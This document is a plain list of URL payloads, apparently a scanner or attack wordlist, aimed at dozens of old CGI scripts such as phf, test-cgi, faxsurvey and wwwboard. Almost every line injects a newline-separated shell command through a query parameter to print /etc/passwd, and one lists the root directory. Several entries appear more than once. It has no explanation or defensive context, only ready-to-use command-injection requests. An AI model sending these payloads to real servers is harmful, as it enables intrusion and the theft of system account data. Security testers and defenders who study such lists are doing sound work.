whois_raw.cgi#whois_raw.cgi?fqdn=%0acat%20/etc/passwd
faxsurvey#faxsurvey?/bin/cat%20/etc/passwd
phf#phf?Qalias=x%0a/bin/cat%20/etc/passwd
test-cgi#test-cgi?*%0a/bin/ls%20-al%20/
nph-test-cgi#nph-test-cgi?*%0a/bin/cat%20/etc/passwd
handler#handler?*%0a/bin/cat%20/etc/passwd
Count.cgi#Count.cgi?df=/%0a/bin/cat%20/etc/passwd
AnyForm2.pl#AnyForm2.pl?*%0a/bin/cat%20/etc/passwd
finger#finger?user=%0a/bin/cat%20/etc/passwd
guestbook.cgi#guestbook.cgi?user=%0a/bin/cat%20/etc/passwd
webdist.cgi#webdist.cgi?language=1%0a/bin/cat%20/etc/passwd
nph-publish#nph-publish?*%0a/bin/cat%20/etc/passwd
faxsurvey#faxsurvey?/bin/cat%20/etc/passwd
htmlscript#htmlscript?*%0a/bin/cat%20/etc/passwd
ucbmail#ucbmail?*%0a/bin/cat%20/etc/passwd
perlshop.cgi#perlshop.cgi?*%0a/bin/cat%20/etc/passwd
php.cgi#php.cgi?*%0a/bin/cat%20/etc/passwd
textcounter.pl#textcounter.pl?*%0a/bin/cat%20/etc/passwd
view-source#view-source?*%0a/bin/cat%20/etc/passwd
global.cgi#global.cgi?*%0a/bin/cat%20/etc/passwd
statit#statit?*%0a/bin/cat%20/etc/passwd
webgais#webgais?*%0a/bin/cat%20/etc/passwd
wguest.exe#wguest.exe?*%0a/bin/cat%20/etc/passwd
websendmail#websendmail?*%0a/bin/cat%20/etc/passwd
webwho#webwho?*%0a/bin/cat%20/etc/passwd
w3-msql#w3-msql?*%0a/bin/cat%20/etc/passwd
maillist.pl#maillist.pl?*%0a/bin/cat%20/etc/passwd
wrap#wrap?*%0a/bin/cat%20/etc/passwd
icat#icat?*%0a/bin/cat%20/etc/passwd
info2www#info2www?*%0a/bin/cat%20/etc/passwd
campas#campas?*%0a/bin/cat%20/etc/passwd
ssi#ssi?*%0a/bin/cat%20/etc/passwd
Aglimpse#Aglimpse?*%0a/bin/cat%20/etc/passwd
Glimpse#Glimpse?*%0a/bin/cat%20/etc/passwd
Man.sh#Man.sh?*%0a/bin/cat%20/etc/passwd
Moogle#Moogle?*%0a/bin/cat%20/etc/passwd
mhdf#mhdf?*%0a/bin/cat%20/etc/passwd
multimap#multimap?*%0a/bin/cat%20/etc/passwd
phftest#phftest?*%0a/bin/cat%20/etc/passwd
redir#redir?*%0a/bin/cat%20/etc/passwd
Test-cgi#Test-cgi?*%0a/bin/cat%20/etc/passwd
whois_raw.cgi#whois_raw.cgi?*%0a/bin/cat%20/etc/passwd
wraped#wraped?*%0a/bin/cat%20/etc/passwd
wguest#Wguest?*%0a/bin/cat%20/etc/passwd
wwwboard#wwwboard?*%0a/bin/cat%20/etc/passwd
www-sql#www-sql?*%0a/bin/cat%20/etc/passwd
wwwwais#wwwwais?*%0a/bin/cat%20/etc/passwd
webdist.cgi#webdist.cgi?*%0a/bin/cat%20/etc/passwd
wrap#wrap?*%0a/bin/cat%20/etc/passwd
handler#handler?*%0a/bin/cat%20/etc/passwd
textcounter.pl#textcounter.pl?*%0a/bin/cat%20/etc/passwd
view-source#view-source?*%0a/bin/cat%20/etc/passwd
statit#statit?*%0a/bin/cat%20/etc/passwd
webgais#webgais?*%0a/bin/cat%20/etc/passwd
maillist.pl#maillist.pl?*%0a/bin/cat%20/etc/passwd
websendmail#websendmail?*%0a/bin/cat%20/etc/passwd
wguest.exe#wguest.exe?*%0a/bin/cat%20/etc/passwd
webwho#webwho?*%0a/bin/cat%20/etc/passwd
w3-msql#w3-msql?*%0a/bin/cat%20/etc/passwd
nph-test-cgi#nph-test-cgi?*%0a/bin/cat%20/etc/passwd
wraped#wraped?*%0a/bin/cat%20/etc/passwd
wwwboard#wwwboard?*%0a/bin/cat%20/etc/passwd
webdist.cgi#webdist.cgi?language=1%0a/bin/cat%20/etc/passwd
icat#icat?*%0a/bin/cat%20/etc/passwd
info2www#info2www?*%0a/bin/cat%20/etc/passwd
Aglimpse#Aglimpse?*%0a/bin/cat%20/etc/passwd
Man.sh#Man.sh?*%0a/bin/cat%20/etc/passwd